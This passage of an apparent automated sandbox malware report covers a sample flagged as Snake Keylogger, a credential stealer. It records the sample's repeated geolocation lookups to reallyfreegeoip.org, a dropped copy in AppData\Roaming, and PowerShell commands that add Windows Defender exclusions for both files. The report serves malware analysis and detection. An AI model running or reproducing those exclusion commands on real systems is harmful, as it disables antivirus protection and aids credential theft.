2024-11-18 17:18:52 UTC	87	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-18 17:18:52 UTC	851	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:18:52 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 51806 Last-Modified: Mon, 18 Nov 2024 02:55:26 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t0PsM9vo2zYweYDpGwEhMtykfnbZ8S4pSSxhFAEjdVuU43m%2B438zoE5ST9h9h9mCkxbwZx7yoHeTsZ3s6aQy%2BvpQlQLpUTdKvrQ5h6zdadEI9%2BnOZ%2FoumxYIb6tf3JmnzqYEaLvb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e499f4c8a21e757-DEN alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=18784&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=154132&cwnd=32&unsent_bytes=0&cid=a7eeaaea0c8dafe9&ts=162&x=0"
2024-11-18 17:18:52 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.8	49727	188.114.97.3	443	5420	C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 17:18:54 UTC	63	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-18 17:18:54 UTC	854	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:18:54 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 51817 Last-Modified: Mon, 18 Nov 2024 02:55:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wykWLrjXHP%2FlgaUWhiUnAl0g2RTRJd1tYhgomkwoI%2Bvxm0rQCFd83ro%2B8t4ivtSb2yZGGcHc%2BS8NT7SQscOTLkQdX6d77E9s6dspZtFB%2BQpaQgsWIREglpYpxEqRL0XjfJttwbkv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e499f542e782848-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1652&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1612472&cwnd=251&unsent_bytes=0&cid=ace4c9230a4276a9&ts=159&x=0"
2024-11-18 17:18:54 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.8	49729	188.114.97.3	443	3636	C:\Users\user\Desktop\PROFORMA + PENDENTES.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 17:18:54 UTC	63	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-18 17:18:54 UTC	849	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:18:54 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 402 Last-Modified: Mon, 18 Nov 2024 17:12:12 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k60Z6YuIGWwHHKw0UxOKIy6dQZHzBF%2Bt6u2y%2F3ix9Rncv9G43ttQPCU5ZQjlywTNk%2Fpz41tuhzOgT7mH%2BwjYENUPH8J2JG5XJHKO8z3hIZyhb9sB7Th0fsmCP1ZGoZE5ChRzGGWf"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e499f55f98c6354-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=24846&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=116351&cwnd=32&unsent_bytes=0&cid=45b22792198b44a6&ts=176&x=0"
2024-11-18 17:18:54 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.8	49734	188.114.97.3	443	5420	C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 17:18:55 UTC	87	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-18 17:18:55 UTC	847	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:18:55 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 51809 Last-Modified: Mon, 18 Nov 2024 02:55:26 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=krw6N05aTkdrFU3OO1PHyQBkPMmdF9OVSMXxxCfioE4YgdY%2BQS2JMzwvKx7Na6EwXLWBy9yGYBBYtaidXilVK7Liahnj%2FnMrU36yQqOG6SFc0Cbm0ckuwFmudNXmVL5ztEcIxKVm"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e499f5dbb43e73b-DEN alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=18814&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=153471&cwnd=32&unsent_bytes=0&cid=1f8a421a812da1e9&ts=196&x=0"
2024-11-18 17:18:55 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.8	49735	188.114.97.3	443	3636	C:\Users\user\Desktop\PROFORMA + PENDENTES.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 17:18:55 UTC	87	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-18 17:18:56 UTC	853	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:18:55 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 403 Last-Modified: Mon, 18 Nov 2024 17:12:12 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GnaK8fw%2FfJd9qfyrO9RwttdFQJYIUbW4ZXnZyO%2BQQHIguUXxhRzpD3FKW7zSnAyhKqaetfwb%2FTglLivLanUO%2FXI%2FbNdbspJMFKOHorEGQmmm1GLvkpu%2BkL89IazYybnFhrE6uuQ6"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e499f5f5eeee815-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=23377&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=123871&cwnd=32&unsent_bytes=0&cid=264770afc73ac6d6&ts=181&x=0"
2024-11-18 17:18:56 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.8	49737	188.114.97.3	443	5420	C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 17:18:57 UTC	63	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-18 17:18:57 UTC	858	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:18:57 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 6375 Last-Modified: Mon, 18 Nov 2024 15:32:42 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KR4PgRjZvmy35gu7cgicKG5VpQRYkyEv0XV82y%2BuKykwS5k6%2B%2B%2B9iwghQ7mm%2FOaKVoTMTjJhbbS5J9P%2BdoToM%2BneAm1ph1BJIrYgDE%2F61wwu2Y4k8qBq5xyipReXYlgkBEVVB76o"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e499f6b2e4f7be1-ATL alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=20125&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=143501&cwnd=32&unsent_bytes=0&cid=0a75b70d373e23bd&ts=223&x=0"
2024-11-18 17:18:57 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.8	49739	188.114.97.3	443	5420	C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 17:18:59 UTC	87	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-18 17:18:59 UTC	849	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:18:59 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 51813 Last-Modified: Mon, 18 Nov 2024 02:55:26 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SmdLQejwTNkw%2B%2F2WK%2FsYEbOGgcAMj0BesUa0jxGfEJKGw5dOzbwxXTBptJX12oBT3Y7gb4abBzRLxMbUzIUUnYe1CafVaHfUbqiZVNgxBIIJoJ7SWBThCZTqN1piXyfBtYg7aX83"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e499f774bd6798a-DEN alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=18606&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=155740&cwnd=32&unsent_bytes=0&cid=4d3b8426f0ca3def&ts=174&x=0"
2024-11-18 17:18:59 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.8	49741	188.114.97.3	443	5420	C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 17:19:01 UTC	63	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-18 17:19:01 UTC	854	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:19:01 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 6379 Last-Modified: Mon, 18 Nov 2024 15:32:42 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pA6KaBroP7BLrCkuM%2F2Ff7D3X99jdWvLQDJFYUq6oVwtZ7kf02cxve6gJOFn0ThINm%2BtTlNnAT89rv0L%2B1cCoLrSrjDKidPQWER%2FOpk0%2BlAF%2FI0S9RapVXOmZ57bqcWC7EktIeid"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e499f809cedafa2-ATL alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=17784&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=161471&cwnd=32&unsent_bytes=0&cid=3b7f959fdcd45122&ts=179&x=0"
2024-11-18 17:19:01 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.8	49743	188.114.97.3	443	5420	C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 17:19:03 UTC	63	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-18 17:19:03 UTC	846	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:19:03 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 6381 Last-Modified: Mon, 18 Nov 2024 15:32:42 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ms6eaZ5i9SOs5kQRULyQWI22gMkPgJsI%2BATYYA7vWCr3wdll2bDz6ooCfJq%2FWuEUX2lHGtLe6vf1n3MElcqSySWLYhULGgR5GhNQrNgpDimVFKr1PR9qHuvhXxAFHtWChtLwz1r7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e499f914ccd4507-ATL alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=19429&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=152920&cwnd=32&unsent_bytes=0&cid=a11617510cd5b55b&ts=192&x=0"
2024-11-18 17:19:03 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Target ID:	0
Start time:	12:18:36
Start date:	18/11/2024
Path:	C:\Users\user\Desktop\PROFORMA + PENDENTES.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PROFORMA + PENDENTES.exe"
Imagebase:	0x3b0000
File size:	617'984 bytes
MD5 hash:	4D74CEBD8DDAAE78DE8144F1ABB245E5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1484282889.0000000003791000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.1484282889.0000000003791000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1484282889.0000000003791000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.1484282889.0000000003791000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	12:18:40
Start date:	18/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe"
Imagebase:	0x3e0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	12:18:40
Start date:	18/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	12:18:41
Start date:	18/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe"
Imagebase:	0x3e0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	12:18:41
Start date:	18/11/2024
Path:	C:\Windows\System32\conhost.exe
